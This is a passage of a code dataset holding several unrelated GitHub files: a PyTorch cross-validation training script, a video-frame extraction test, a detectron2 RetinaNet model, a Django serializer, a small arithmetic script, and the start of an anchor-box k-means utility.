#scheduler.step()\n \n #train performance \n iteration += 1\n iteration_counted += 1\n if iteration % iter_valid == 0: \n y_train = torch.tensor([])\n y_tpred = torch.tensor([])\n iteration_counted = 0\n \n if iteration_counted < iteration4train: \n y_train = torch.cat([y_train, y.detach().cpu()])\n y_tpred = torch.cat([y_tpred, outputs.detach().cpu()])\n \n if iteration_counted == iteration4train: \n train_auc = roc_auc_score(y_true=y_train, y_score=y_tpred)\n y_tpred = (y_tpred > 0.5) \n train_acc = accuracy_score(y_true=y_train, y_pred=y_tpred)\n \n total_time = time.time() - 
start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('train batch number:', iteration, ', time:', total_time_str)\n print('train: loss {:.3f}, acc {:.3f}, auc {:.3f}'.format(\n loss, train_acc, train_auc))\n \n print(\"valid performance\")\n model.eval()\n epoch_valid_losses = []\n y_valid = torch.tensor([])\n y_vpred = torch.tensor([])\n for x,y in valid_loader:\n x,y = x.to(device),y.to(device)\n outputs = model(x)\n loss = cost_function(outputs,y.type_as(outputs))\n epoch_valid_losses.append(loss.item())\n \n y_valid = torch.cat([y_valid, y.detach().cpu()])\n y_vpred = torch.cat([y_vpred, outputs.detach().cpu()])\n \n valid_loss = np.mean(epoch_valid_losses)\n valid_auc = roc_auc_score(y_score=y_vpred, y_true=y_valid)\n y_vpred = (y_vpred > 0.5)\n valid_acc = accuracy_score(y_true=y_valid, y_pred=y_vpred)\n \n # Print the result\n print('valid: loss {:.3f}, acc {:.3f}, valid_auc {:.3f}'.format(\n valid_loss, valid_acc, valid_auc))\n \n # if epoch > 0 and float(valid_loss) < min_loss:\n if float(valid_loss) < min_loss:\n print('save the best model\\n')\n min_loss = valid_loss\n \n filename_m = out_dir + 'best_model' + str(foldno) +'.pth'\n torch.save({\n 'state_dict': model.state_dict(),\n 'iteration': iteration,\n 'epoch': epoch,\n }, filename_m)\n \n # epoch ends\n \n print('Finish training.')\n return\n\n#--------------------------------------------------------------------------\n# Make prediction on test data\ndef predict_test(model, test_loader, device):\n print('For test part.....')\n model.eval()\n predictions = torch.tensor([])\n y_test = torch.tensor([])\n for x,y in test_loader:\n x,y = x.to(device),y.to(device)\n predictions = torch.cat([predictions,model(x).detach().cpu()])\n y_test = torch.cat([y_test, y.detach().cpu()])\n predictions = predictions.numpy()\n return predictions, y_test\n\ndef run_test(test_df, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n # Setting up GPU\n\n #device = torch.device('cuda:0' if torch.cuda.is_available else 'cpu')\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n \n test_set = image_set(test_df, DATA_PATH, mode='valid')\n test_loader = DataLoader(\n test_set,\n sampler = SequentialSampler(test_set), \n batch_size = BATCH_SIZE, \n drop_last = False,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n print(\"len of test_loader:\", len(test_loader))\n\n for foldno in range(10):\n # build the model\n model = alphafold.AlphafoldNet()\n model= model.to(device)\n # load the best model\n initial_checkpoint = out_dir + 'best_model' + str(foldno) +'.pth'\n f = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)\n model.load_state_dict(f['state_dict'], strict=True)\n start_iteration = f['iteration']\n start_epoch = f['epoch']\n\n predictions, y_test = predict_test(model, test_loader, device)\n if foldno == 0:\n pred = predictions\n else:\n pred += predictions\n pred /= 10.0\n test_auc = roc_auc_score(y_score=pred, y_true=y_test)\n print(f\"test_auc SCORE: {test_auc}\")\n pred = np.where(pred > 0.5, 1, 0)\n print(\"confusion_matrix\")\n print(confusion_matrix(y_test,pred))\n print(\"testset classification_report\")\n print(classification_report(y_test, pred, digits=4))\n \n print('testing done!')\n \n################################################################\n'''\n\nif __name__ == '__main__':\n\n #load the samples for both postivte and megative samples\n train_df = pd.read_csv(DATA_PATH + \"samples_both.csv\", header=None, names=['sample_id'])\n train_df['label'] = 
train_df['sample_id'].astype(str).str[-5:-4]\n    print(\"train_df\", train_df.head())\n\n    #split the train_df into train, validation and test df\n    train_df,test_df,_,_ = train_test_split(train_df,train_df,test_size=0.10,random_state=42)\n\n    #10 fold training on the remaining train_df dataset\n    train_df = train_df.reset_index(drop=True)\n    folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n    for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df, train_df['label'])):\n        print(\"FOLDS : \", n_fold)\n        train = train_df.loc[train_idx]\n        valid = train_df.loc[valid_idx]\n        print('proteins for training: {}, for validation: {}'.format(\n            train.shape[0], valid.shape[0]))\n        \n        train_model(n_fold, train, valid)\n    print('training done!')\n\n    run_test(test_df)\n\n'''\n\ndef run(DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n    # load the samples for both positive and negative samples\n    train_df = pd.read_csv(DATA_PATH + \"samples_both.csv\", header=None, names=['sample_id'])\n    train_df['label'] = train_df['sample_id'].astype(str).str[-5:-4]\n    print(\"train_df\", train_df.head())\n\n    # split the train_df into train, validation and test df\n    train_df,test_df,_,_ = train_test_split(train_df,train_df,test_size=0.10,random_state=42)\n\n    # 10 fold training on the remaining train_df dataset\n    train_df = train_df.reset_index(drop=True)\n    folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n    for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df, train_df['label'])):\n        print(\"FOLDS : \", n_fold)\n        train = train_df.loc[train_idx]\n        valid = train_df.loc[valid_idx]\n        print('proteins for training: {}, for validation: {}'.format(\n            train.shape[0], valid.shape[0]))\n        \n        # forward the caller's settings instead of hard-coding 16/20, which\n        # silently ignored the BATCH_SIZE and EPOCHS arguments of run()\n        train_model(n_fold, train, valid, DATA_PATH, out_dir, BATCH_SIZE=BATCH_SIZE, EPOCHS=EPOCHS)\n    print('training done!')\n\n    run_test(test_df, DATA_PATH, out_dir, BATCH_SIZE=BATCH_SIZE, EPOCHS=EPOCHS)","repo_name":"lonelu/Metalprot_learning","sub_path":"src/trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25040642800","text":"from pathlib import Path\n\nfrom yogoflow.services.video_processor import video_processor\n\n\ntest_video_path = str(Path(__file__).parent / \"test.mp4\")\nout_dir = str(Path(__file__).parent / \"out\" / \"frames\")\n\n\ndef test_extract_frames():\n    urls = video_processor.extract_frames(test_video_path, out_dir, step_size=30)\n    assert len(urls) == 30\n\n\ndef test_extract_frames_error():\n    bad_path = \"not_a_real_file.mp4\"\n    urls = video_processor.extract_frames(bad_path, out_dir, step_size=30)\n    assert len(urls) == 0\n
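\n\ndef test_extract_frames_larger_step():\n    # Hedged sketch (editor addition): assuming step_size subsamples the same\n    # fixture, doubling the step should never yield more frames than before.\n    urls = video_processor.extract_frames(test_video_path, out_dir, step_size=60)\n    assert len(urls) <= 30\n","repo_name":"dharness/yogoflow","sub_path":"server/tests/test_video_processor.py","file_name":"test_video_processor.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18740525530","text":"import logging\nimport math\nimport time\nimport numpy as np\nfrom typing import List\nimport torch\nfrom fvcore.nn import sigmoid_focal_loss_jit, smooth_l1_loss\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom detectron2.layers import ShapeSpec, batched_nms, cat, get_norm, Conv2d\nfrom detectron2.structures import Boxes, ImageList, Instances, pairwise_iou\nfrom detectron2.utils.events import get_event_storage\nfrom detectron2.utils.logger import log_first_n\nimport detectron2.utils.comm as comm\n\nfrom 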
detectron2.modeling.anchor_generator import build_anchor_generator\nfrom detectron2.modeling.backbone import build_backbone\nfrom detectron2.modeling.box_regression import Box2BoxTransform\nfrom detectron2.modeling.matcher import Matcher\nfrom detectron2.modeling.postprocessing import detector_postprocess\nfrom detectron2.modeling.meta_arch.build import META_ARCH_REGISTRY\n\nfrom torch.cuda import Event\nfrom utils.loop_matcher import LoopMatcher\n\n\n__all__ = [\"RetinaNet_D2\"]\n\n\ndef permute_to_N_HWA_K(tensor, K):\n \"\"\"\n Transpose/reshape a tensor from (N, (A x K), H, W) to (N, (HxWxA), K)\n \"\"\"\n assert tensor.dim() == 4, tensor.shape\n N, _, H, W = tensor.shape\n tensor = tensor.view(N, -1, K, H, W)\n tensor = tensor.permute(0, 3, 4, 1, 2)\n tensor = tensor.reshape(N, -1, K) # Size=(N,HWA,K)\n return tensor\n\n\ndef permute_all_cls_and_box_to_N_HWA_K_and_concat(box_cls, box_delta, num_classes=80):\n \"\"\"\n Rearrange the tensor layout from the network output, i.e.:\n list[Tensor]: #lvl tensors of shape (N, A x K, Hi, Wi)\n to per-image predictions, i.e.:\n Tensor: of shape (N x sum(Hi x Wi x A), K)\n \"\"\"\n # for each feature level, permute the outputs to make them be in the\n # same format as the labels. Note that the labels are computed for\n # all feature levels concatenated, so we keep the same representation\n # for the objectness and the box_delta\n box_cls_flattened = [permute_to_N_HWA_K(x, num_classes) for x in box_cls]\n box_delta_flattened = [permute_to_N_HWA_K(x, 4) for x in box_delta]\n # concatenate on the first dimension (representing the feature levels), to\n # take into account the way the labels were generated (with all feature maps\n # being concatenated as well)\n box_cls = cat(box_cls_flattened, dim=1).view(-1, num_classes)\n box_delta = cat(box_delta_flattened, dim=1).view(-1, 4)\n return box_cls, box_delta\n\n\ndef permute_all_to_NHWA_K_not_concat(box_cls, box_delta, num_classes=80):\n box_cls_flattened = [permute_to_N_HWA_K(x, num_classes).view(-1, num_classes) for x in box_cls]\n box_delta_flattened = [permute_to_N_HWA_K(x, 4).view(-1, 4) for x in box_delta]\n return box_cls_flattened, box_delta_flattened\n\n@META_ARCH_REGISTRY.register()\nclass RetinaNet_D2(nn.Module):\n \"\"\"\n Implement RetinaNet in :paper:`RetinaNet`.\n \"\"\"\n\n def __init__(self, cfg):\n super().__init__()\n\n # fmt: off\n self.num_classes = cfg.MODEL.RETINANET.NUM_CLASSES\n self.in_features = cfg.MODEL.RETINANET.IN_FEATURES\n # Loss parameters:\n self.focal_loss_alpha = cfg.MODEL.CUSTOM.FOCAL_LOSS_ALPHAS\n self.focal_loss_gamma = cfg.MODEL.CUSTOM.FOCAL_LOSS_GAMMAS\n self.cls_weights = cfg.MODEL.CUSTOM.CLS_WEIGHTS\n self.reg_weights = cfg.MODEL.CUSTOM.REG_WEIGHTS\n self.smooth_l1_loss_beta = cfg.MODEL.RETINANET.SMOOTH_L1_LOSS_BETA\n # Inference parameters:\n self.score_threshold = cfg.MODEL.RETINANET.SCORE_THRESH_TEST\n self.topk_candidates = cfg.MODEL.RETINANET.TOPK_CANDIDATES_TEST\n self.nms_threshold = cfg.MODEL.RETINANET.NMS_THRESH_TEST\n self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE\n # Vis parameters\n self.vis_period = cfg.VIS_PERIOD\n self.input_format = cfg.INPUT.FORMAT\n self.scale_factor = 1\n # fmt: on\n\n self.backbone = build_backbone(cfg)\n\n backbone_shape = self.backbone.output_shape()\n feature_shapes = [backbone_shape[f] for f in self.in_features]\n self.head = RetinaNetHead(cfg, feature_shapes)\n self.anchor_generator = build_anchor_generator(cfg, feature_shapes)\n\n # Matching and loss\n self.box2box_transform = 
Box2BoxTransform(weights=cfg.MODEL.RPN.BBOX_REG_WEIGHTS)\n if cfg.MODEL.CUSTOM.USE_LOOP_MATCHER:\n self.matcher = LoopMatcher(\n cfg.MODEL.RETINANET.IOU_THRESHOLDS,\n cfg.MODEL.RETINANET.IOU_LABELS,\n allow_low_quality_matches=True,\n )\n else:\n self.matcher = Matcher(\n cfg.MODEL.RETINANET.IOU_THRESHOLDS,\n cfg.MODEL.RETINANET.IOU_LABELS,\n allow_low_quality_matches=True,\n )\n\n self.register_buffer(\"pixel_mean\", torch.Tensor(cfg.MODEL.PIXEL_MEAN).view(-1, 1, 1))\n self.register_buffer(\"pixel_std\", torch.Tensor(cfg.MODEL.PIXEL_STD).view(-1, 1, 1))\n\n \"\"\"\n In Detectron1, loss is normalized by number of foreground samples in the batch.\n When batch size is 1 per GPU, #foreground has a large variance and\n using it lead to lower performance. Here we maintain an EMA of #foreground to\n stabilize the normalizer.\n \"\"\"\n self.loss_normalizer = 100 # initialize with any reasonable #fg that's not too small\n self.loss_normalizer_momentum = 0.9\n\n self.iter = 0\n self.class_stat = [0 for _ in range(10)]\n\n @property\n def device(self):\n return self.pixel_mean.device\n\n\n def visualize_training(self, batched_inputs, results):\n from detectron2.utils.visualizer import Visualizer\n\n assert len(batched_inputs) == len(\n results\n ), \"Cannot visualize inputs and results of different sizes\"\n storage = get_event_storage()\n max_boxes = 20\n\n image_index = 0 # only visualize a single image\n img = batched_inputs[image_index][\"image\"].cpu().numpy()\n assert img.shape[0] == 3, \"Images should have 3 channels.\"\n if self.input_format == \"BGR\":\n img = img[::-1, :, :]\n img = img.transpose(1, 2, 0)\n v_gt = Visualizer(img, None)\n v_gt = v_gt.overlay_instances(boxes=batched_inputs[image_index][\"instances\"].gt_boxes)\n anno_img = v_gt.get_image()\n processed_results = detector_postprocess(results[image_index], img.shape[0], img.shape[1])\n predicted_boxes = processed_results.pred_boxes.tensor.detach().cpu().numpy()\n\n v_pred = Visualizer(img, None)\n v_pred = v_pred.overlay_instances(boxes=predicted_boxes[0:max_boxes])\n prop_img = v_pred.get_image()\n vis_img = np.vstack((anno_img, prop_img))\n vis_img = vis_img.transpose(2, 0, 1)\n vis_name = f\"Top: GT bounding boxes; Bottom: {max_boxes} Highest Scoring Results\"\n storage.put_image(vis_name, vis_img)\n\n\n def forward(self, batched_inputs):\n start_event = Event(enable_timing=True)\n end_event = Event(enable_timing=True)\n\n images = self.preprocess_image(batched_inputs)\n if \"instances\" in batched_inputs[0]:\n gt_instances = [x[\"instances\"].to(self.device) for x in batched_inputs]\n elif \"targets\" in batched_inputs[0]:\n log_first_n(\n logging.WARN, \"'targets' in the model inputs is now renamed to 'instances'!\", n=10\n )\n gt_instances = [x[\"targets\"].to(self.device) for x in batched_inputs]\n else:\n gt_instances = None\n \n start_event.record()\n\n features = self.backbone(images.tensor)\n features = [features[f] for f in self.in_features]\n box_cls, box_delta = self.head(features)\n anchors = self.anchor_generator(features)\n\n if self.training:\n # torch.cuda.empty_cache()\n # gt_classes, gt_anchors_reg_deltas = self.get_ground_truth(anchors, gt_instances)\n # losses = self.losses(gt_classes, gt_anchors_reg_deltas, box_cls, box_delta)\n\n gt_classes, gt_deltas = self.get_det_gt(anchors, gt_instances)\n losses = self.det_loss(gt_classes, gt_deltas, box_cls, box_delta, self.focal_loss_alpha, self.focal_loss_gamma, self.cls_weights, self.reg_weights)\n\n\n if self.vis_period > 0:\n storage = get_event_storage()\n 
if storage.iter % self.vis_period == 0:\n results = self.inference(box_cls, box_delta, anchors, images.image_sizes)\n self.visualize_training(batched_inputs, results)\n\n return losses\n else:\n results = self.inference(box_cls, box_delta, anchors, images.image_sizes)\n end_event.record()\n torch.cuda.synchronize()\n total_time = start_event.elapsed_time(end_event)\n processed_results = []\n for results_per_image, input_per_image, image_size in zip(\n results, batched_inputs, images.image_sizes\n ):\n height = input_per_image.get(\"height\", image_size[0])\n width = input_per_image.get(\"width\", image_size[1])\n r = detector_postprocess(results_per_image, height, width)\n processed_results.append({\"instances\": r, 'time':total_time})\n return processed_results\n\n\n @torch.no_grad()\n def get_det_gt(self, anchors, targets):\n gt_classes = []\n gt_anchors_deltas = []\n anchor_layers = len(anchors)\n anchor_lens = [len(x) for x in anchors]\n start_inds = [0] + [sum(anchor_lens[:i]) for i in range(1, len(anchor_lens))]\n end_inds = [sum(anchor_lens[:i+1]) for i in range(len(anchor_lens))]\n anchors = Boxes.cat(anchors) # Rx4\n\n for targets_per_image in targets:\n if type(self.matcher) == Matcher:\n match_quality_matrix = pairwise_iou(targets_per_image.gt_boxes, anchors)\n gt_matched_idxs, anchor_labels = self.matcher(match_quality_matrix)\n del(match_quality_matrix)\n else:\n gt_matched_idxs, anchor_labels = self.matcher(targets_per_image.gt_boxes, anchors)\n\n has_gt = len(targets_per_image) > 0\n if has_gt:\n # ground truth box regression\n matched_gt_boxes = targets_per_image.gt_boxes[gt_matched_idxs]\n gt_anchors_reg_deltas_i = self.box2box_transform.get_deltas(\n anchors.tensor, matched_gt_boxes.tensor\n )\n\n gt_classes_i = targets_per_image.gt_classes[gt_matched_idxs]\n # Anchors with label 0 are treated as background.\n gt_classes_i[anchor_labels == 0] = self.num_classes\n # Anchors with label -1 are ignored.\n gt_classes_i[anchor_labels == -1] = -1\n\n else:\n gt_classes_i = torch.zeros_like(gt_matched_idxs) + self.num_classes\n gt_anchors_reg_deltas_i = torch.zeros_like(anchors.tensor)\n\n gt_classes.append([gt_classes_i[s:e] for s, e in zip(start_inds, end_inds)])\n gt_anchors_deltas.append([gt_anchors_reg_deltas_i[s:e] for s, e in zip(start_inds, end_inds)])\n \n gt_classes = [torch.stack([x[i] for x in gt_classes]) for i in range(anchor_layers)]\n gt_anchors_deltas = [torch.stack([x[i] for x in gt_anchors_deltas]) for i in range(anchor_layers)]\n\n gt_classes = torch.cat([x.flatten() for x in gt_classes])\n gt_anchors_deltas = torch.cat([x.reshape(-1, 4) for x in gt_anchors_deltas])\n\n return gt_classes, gt_anchors_deltas\n\n\n def det_loss(self, gt_classes, gt_anchors_deltas, pred_logits, pred_deltas, alphas, gammas, cls_weights, reg_weights):\n def convert_gt_cls(logits, gt_class, f_idxs):\n gt_classes_target = torch.zeros_like(logits)\n gt_classes_target[f_idxs, gt_class[f_idxs]] = 1\n return gt_classes_target\n\n assert len(cls_weights) == len(pred_logits)\n assert len(cls_weights) == len(reg_weights)\n\n pred_logits, pred_deltas = permute_all_to_NHWA_K_not_concat(pred_logits, pred_deltas, self.num_classes)\n \n lengths = [x.shape[0] for x in pred_logits]\n start_inds = [0] + [sum(lengths[:i]) for i in range(1, len(lengths))]\n end_inds = [sum(lengths[:i+1]) for i in range(len(lengths))]\n \n gt_classes = gt_classes.flatten()\n gt_anchors_deltas = gt_anchors_deltas.view(-1, 4)\n\n valid_idxs = gt_classes >= 0\n foreground_idxs = (gt_classes >= 0) & (gt_classes != 
self.num_classes)\n num_foreground = foreground_idxs.sum().item()\n get_event_storage().put_scalar(\"num_foreground\", num_foreground)\n self.loss_normalizer = (\n self.loss_normalizer_momentum * self.loss_normalizer\n + (1 - self.loss_normalizer_momentum) * num_foreground\n )\n gt_clsses_list = [gt_classes[s:e] for s, e in zip(start_inds, end_inds)]\n gt_anchors_deltas_list = [gt_anchors_deltas[s:e] for s, e in zip(start_inds, end_inds)]\n valid_idxs_list = [valid_idxs[s:e] for s, e in zip(start_inds, end_inds)]\n foreground_idxs_list = [foreground_idxs[s:e] for s, e in zip(start_inds, end_inds)]\n\n loss_cls = [\n w * sigmoid_focal_loss_jit(\n x[v],\n convert_gt_cls(x, g, f)[v].detach(),\n alpha=alpha,\n gamma=gamma,\n reduction=\"sum\"\n ) \n for w, x, g, v, f, alpha, gamma in zip(cls_weights, pred_logits, gt_clsses_list, valid_idxs_list, foreground_idxs_list, alphas, gammas)\n ]\n \n loss_box_reg = [\n w * smooth_l1_loss(\n x[f], \n g[f].detach(),\n beta=self.smooth_l1_loss_beta,\n reduction=\"sum\"\n )\n for w, x, g, f in zip(reg_weights, pred_deltas, gt_anchors_deltas_list, foreground_idxs_list)\n ]\n \n loss_cls = sum(loss_cls) / max(1., self.loss_normalizer)\n loss_box_reg = sum(loss_box_reg) / max(1., self.loss_normalizer)\n return {\"loss_cls\": loss_cls, \"loss_box_reg\": loss_box_reg}\n\n\n def inference(self, box_cls, box_delta, anchors, image_sizes):\n \"\"\"\n Arguments:\n box_cls, box_delta: Same as the output of :meth:`RetinaNetHead.forward`\n anchors (list[Boxes]): A list of #feature level Boxes.\n The Boxes contain anchors of this image on the specific feature level.\n image_sizes (List[torch.Size]): the input image sizes\n\n Returns:\n results (List[Instances]): a list of #images elements.\n \"\"\"\n results = []\n times = []\n\n box_cls = [permute_to_N_HWA_K(x, self.num_classes) for x in box_cls]\n box_delta = [permute_to_N_HWA_K(x, 4) for x in box_delta]\n\n for img_idx, image_size in enumerate(image_sizes):\n box_cls_per_image = [box_cls_per_level[img_idx] for box_cls_per_level in box_cls]\n box_reg_per_image = [box_reg_per_level[img_idx] for box_reg_per_level in box_delta]\n results_per_image = self.inference_single_image(\n box_cls_per_image, box_reg_per_image, anchors, (image_size[0]*self.scale_factor, image_size[1]*self.scale_factor)\n )\n results.append(results_per_image)\n return results\n\n\n def inference_single_image(self, box_cls, box_delta, anchors, image_size):\n \"\"\"\n Single-image inference. Return bounding-box detection results by thresholding\n on scores and applying non-maximum suppression (NMS).\n\n Arguments:\n box_cls (list[Tensor]): list of #feature levels. Each entry contains\n tensor of size (H x W x A, K)\n box_delta (list[Tensor]): Same shape as 'box_cls' except that K becomes 4.\n anchors (list[Boxes]): list of #feature levels. 
Each entry contains\n a Boxes object, which contains all the anchors for that\n image in that feature level.\n image_size (tuple(H, W)): a tuple of the image height and width.\n\n Returns:\n Same as `inference`, but for only one image.\n \"\"\"\n boxes_all = []\n scores_all = []\n class_idxs_all = []\n\n # Iterate over every feature level\n for box_cls_i, box_reg_i, anchors_i in zip(box_cls, box_delta, anchors):\n # (HxWxAxK,)\n box_cls_i = box_cls_i.flatten().sigmoid_()\n\n # Keep top k top scoring indices only.\n num_topk = min(self.topk_candidates, box_reg_i.size(0))\n # torch.sort is actually faster than .topk (at least on GPUs)\n predicted_prob, topk_idxs = box_cls_i.sort(descending=True)\n predicted_prob = predicted_prob[:num_topk]\n topk_idxs = topk_idxs[:num_topk]\n\n # filter out the proposals with low confidence score\n keep_idxs = predicted_prob > self.score_threshold\n predicted_prob = predicted_prob[keep_idxs]\n topk_idxs = topk_idxs[keep_idxs]\n\n anchor_idxs = topk_idxs // self.num_classes\n classes_idxs = topk_idxs % self.num_classes\n\n box_reg_i = box_reg_i[anchor_idxs]\n anchors_i = anchors_i[anchor_idxs]\n # predict boxes\n predicted_boxes = self.box2box_transform.apply_deltas(box_reg_i, anchors_i.tensor)\n\n boxes_all.append(predicted_boxes)\n scores_all.append(predicted_prob)\n class_idxs_all.append(classes_idxs)\n\n boxes_all, scores_all, class_idxs_all = [\n cat(x) for x in [boxes_all, scores_all, class_idxs_all]\n ]\n \n keep = batched_nms(boxes_all, scores_all, class_idxs_all, self.nms_threshold)\n \n keep = keep[: self.max_detections_per_image]\n\n result = Instances(image_size)\n result.pred_boxes = Boxes(boxes_all[keep])\n result.scores = scores_all[keep]\n result.pred_classes = class_idxs_all[keep]\n return result\n\n\n def preprocess_image(self, batched_inputs):\n \"\"\"\n Normalize, pad and batch the input images.\n \"\"\"\n images = [x[\"image\"].to(self.device) for x in batched_inputs]\n images = [(x - self.pixel_mean) / self.pixel_std for x in images]\n images = ImageList.from_tensors(images, self.backbone.size_divisibility)\n return images\n\n\nclass RetinaNetHead(nn.Module):\n \"\"\"\n The head used in RetinaNet for object classification and box regression.\n It has two subnets for the two tasks, with a common structure but separate parameters.\n \"\"\"\n\n def __init__(self, cfg, input_shape: List[ShapeSpec]):\n super().__init__()\n # fmt: off\n in_channels = input_shape[0].channels\n num_classes = cfg.MODEL.RETINANET.NUM_CLASSES\n num_convs = cfg.MODEL.RETINANET.NUM_CONVS\n prior_prob = cfg.MODEL.RETINANET.PRIOR_PROB\n num_anchors = build_anchor_generator(cfg, input_shape).num_cell_anchors\n # fmt: on\n assert (\n len(set(num_anchors)) == 1\n ), \"Using different number of anchors between levels is not currently supported!\"\n num_anchors = num_anchors[0]\n\n cls_subnet = []\n bbox_subnet = []\n for _ in range(num_convs):\n cls_subnet.append(\n nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)\n )\n cls_subnet.append(nn.ReLU())\n bbox_subnet.append(\n nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)\n )\n bbox_subnet.append(nn.ReLU())\n\n self.cls_subnet = nn.Sequential(*cls_subnet)\n self.bbox_subnet = nn.Sequential(*bbox_subnet)\n self.cls_score = nn.Conv2d(\n in_channels, num_anchors * num_classes, kernel_size=3, stride=1, padding=1\n )\n self.bbox_pred = nn.Conv2d(in_channels, num_anchors * 4, kernel_size=3, stride=1, padding=1)\n\n # Initialization\n for modules in [self.cls_subnet, self.bbox_subnet, 
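self.cls_score, self.bbox_pred]:\n            for layer in modules.modules():\n                if isinstance(layer, nn.Conv2d):\n                    #torch.nn.init.xavier_normal_(layer.weight)\n                    torch.nn.init.normal_(layer.weight, mean=0, std=0.01)\n                    torch.nn.init.constant_(layer.bias, 0)\n\n        # Use prior in model initialization to improve stability\n        bias_value = -(math.log((1 - prior_prob) / prior_prob))\n        torch.nn.init.constant_(self.cls_score.bias, bias_value)\n        # Editor note (hedged): with the usual prior_prob = 0.01 this bias is\n        # -log(0.99/0.01), about -4.6, so every anchor starts with a sigmoid\n        # score near 0.01 and the focal loss is not swamped by easy negatives\n        # in the first iterations.\n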
\n    def forward(self, features):\n        \"\"\"\n        Arguments:\n            features (list[Tensor]): FPN feature map tensors in high to low resolution.\n                Each tensor in the list corresponds to a different feature level.\n\n        Returns:\n            logits (list[Tensor]): #lvl tensors, each has shape (N, AxK, Hi, Wi).\n                The tensor predicts the classification probability\n                at each spatial position for each of the A anchors and K object\n                classes.\n            bbox_reg (list[Tensor]): #lvl tensors, each has shape (N, Ax4, Hi, Wi).\n                The tensor predicts 4-vector (dx,dy,dw,dh) box\n                regression values for every anchor. These values are the\n                relative offset between the anchor and the ground truth box.\n        \"\"\"\n        logits = []\n        bbox_reg = []\n        for feature in features:\n            logits.append(self.cls_score(self.cls_subnet(feature)))\n            bbox_reg.append(self.bbox_pred(self.bbox_subnet(feature)))\n        return logits, bbox_reg\n","repo_name":"ChenhongyiYang/QueryDet-PyTorch","sub_path":"models/retinanet/retinanet.py","file_name":"retinanet.py","file_ext":"py","file_size_in_byte":21851,"program_lang":"python","lang":"en","doc_type":"code","stars":371,"dataset":"github-code","pt":"21"} +{"seq_id":"326135999","text":"from rest_framework import serializers\n\nfrom apps.users.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = User\n        fields = (\n            \"id\",\n            \"email\",\n            \"name\",\n            \"created_at\",\n        )\n        read_only_fields = (\n            \"created_at\",\n        )\n","repo_name":"md-sahil-11/django-starter","sub_path":"apps/users/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22865885401","text":"print(\"1st number\")\nn1 = int(input(\"->\"))\nprint(\"2nd number\")\nn2 = int(input(\"->\"))\n\ntry:\n    # keep separate totals for even and odd multiples of 9 instead of mixing\n    # both into a single counter, and report them once after the loop\n    even_sum = 0\n    odd_sum = 0\n    for i in range(n1, n2+1):\n        if i % 9 == 0:\n            if i % 2 == 0:\n                even_sum += i\n            else:\n                odd_sum += i\n    print(f\"Sum of even numbers {even_sum}\")\n    print(f\"Sum of odd numbers {odd_sum}\")\nexcept Exception as ex:\n    print(\"Error\", ex)
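\n\n# Worked example (editor addition): for n1=1, n2=36 the multiples of 9 are\n# 9, 18, 27 and 36, giving even sum 54 and odd sum 36.","repo_name":"k2supra/Collector_Python","sub_path":"Try-catch/ex_4/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351739202","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef iou(boxes, clusters):\n    \"\"\"\n    Calculates the Intersection over Union (IoU) between N boxes and K clusters.\n    :param boxes: numpy array of shape (n, 2) where n is the number of boxes, shifted to the origin (i. e. 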
width and height)\n :param clusters: numpy array of shape (k, 2) where k is the number of clusters\n :return: numpy array of shape (n, k) where k is the number of clusters\n \"\"\"\n N = boxes.shape[0]\n K = clusters.shape[0]\n iw = np.minimum(\n np.broadcast_to(boxes[:, np.newaxis, 0], (N, K)), # (N, 1) -> (N, K)\n np.broadcast_to(clusters[np.newaxis, :, 0], (N, K)) # (1, K) -> (N, K)\n )\n ih = np.minimum(\n np.broadcast_to(boxes[:, np.newaxis, 1], (N, K)),\n np.broadcast_to(clusters[np.newaxis, :, 1], (N, K))\n )\n if np.count_nonzero(iw == 0) > 0 or np.count_nonzero(ih == 0) > 0:\n raise ValueError(\"Some box has no area\")\n\n intersection = iw * ih # (N, K)\n boxes_area = np.broadcast_to((boxes[:, np.newaxis, 0] * boxes[:, np.newaxis, 1]), (N, K))\n clusters_area = np.broadcast_to((clusters[np.newaxis, :, 0] * clusters[np.newaxis, :, 1]), (N, K))\n\n iou_ = intersection / (boxes_area + clusters_area - intersection + 1e-7)\n\n return iou_\n\ndef avg_iou(boxes, clusters):\n \"\"\"\n Calculates the average Intersection over Union (IoU) between a numpy array of boxes and k clusters.\n :param boxes: numpy array of shape (r, 2), where r is the number of rows\n :param clusters: numpy array of shape (k, 2) where k is the number of clusters\n :return: average IoU as a single float\n \"\"\"\n return np.mean(np.max(iou(boxes, clusters), axis=1))\n\ndef translate_boxes(boxes):\n \"\"\"\n Translates all the boxes to the origin.\n :param boxes: numpy array of shape (r, 4)\n :return: numpy array of shape (r, 2)\n \"\"\"\n new_boxes = boxes.copy()\n for row in range(new_boxes.shape[0]):\n new_boxes[row][2] = np.abs(new_boxes[row][2] - new_boxes[row][0])\n new_boxes[row][3] = np.abs(new_boxes[row][3] - new_boxes[row][1])\n return np.delete(new_boxes, [0, 1], axis=1)\n\ndef kmeans(boxes, k, dist=np.median):\n \"\"\"\n Calculates k-means clustering with the Intersection over Union (IoU) metric.\n :param boxes: 